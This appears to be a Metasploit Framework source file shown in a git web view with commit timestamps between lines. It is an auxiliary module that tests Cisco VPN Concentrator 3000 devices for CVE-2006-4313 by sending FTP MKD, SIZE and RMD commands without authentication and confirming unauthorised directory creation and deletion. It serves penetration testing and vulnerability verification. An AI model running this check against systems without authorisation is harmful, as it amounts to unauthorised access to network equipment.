metasploit-framework/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb

78 lines
2.6 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Tcp
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
'Description' => %q{
This module tests for a logic vulnerability in the Cisco VPN Concentrator
3000 series. It is possible to execute some FTP statements without authentication
(CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs
when working with CWD commands. This module simply creates an arbitrary directory,
verifies that the directory has been created, then deletes it and verifies deletion
to confirm the bug.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '19680' ],
[ 'CVE', '2006-4313' ],
[ 'OSVDB', '28139' ],
[ 'OSVDB', '28138' ]
2013-08-30 21:28:54 +00:00
],
'DisclosureDate' => 'Aug 23 2006'))
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(21),
], self.class)
end
2013-08-30 21:28:54 +00:00
def run
connect
res = sock.get_once
if (res and res =~ /220 Session will be terminated after/)
print_status("Target appears to be a Cisco VPN Concentrator 3000 series.")
2013-08-30 21:28:54 +00:00
test = Rex::Text.rand_text_alphanumeric(8)
2013-08-30 21:28:54 +00:00
print_status("Attempting to create directory: MKD #{test}")
sock.put("MKD #{test}\r\n")
res = sock.get_once(-1,5)
2013-08-30 21:28:54 +00:00
if (res =~/257 MKD command successful\./)
print_status("\tDirectory #{test} reportedly created. Verifying with SIZE #{test}")
sock.put("SIZE #{test}\r\n")
res = sock.get_once(-1,5)
2013-08-30 21:28:54 +00:00
if (res =~ /550 Not a regular file/)
print_status("\tServer reports \"not a regular file\". Directory verified.")
print_status("\tAttempting to delete directory: RMD #{test}")
sock.put("RMD #{test}\r\n")
res = sock.get_once(-1,5)
2013-08-30 21:28:54 +00:00
if (res =~ /250 RMD command successful\./)
print_status("\tDirectory #{test} reportedly deleted. Verifying with SIZE #{test}")
sock.put("SIZE #{test}\r\n")
res = sock.get_once(-1,5)
2013-08-30 21:28:54 +00:00
print_status("\tDirectory #{test} no longer exists!")
print_status("Target is confirmed as vulnerable!")
end
end
end
else
print_status("Target is either not Cisco or the target has been patched.")
end
disconnect
end
2012-03-18 05:07:27 +00:00
end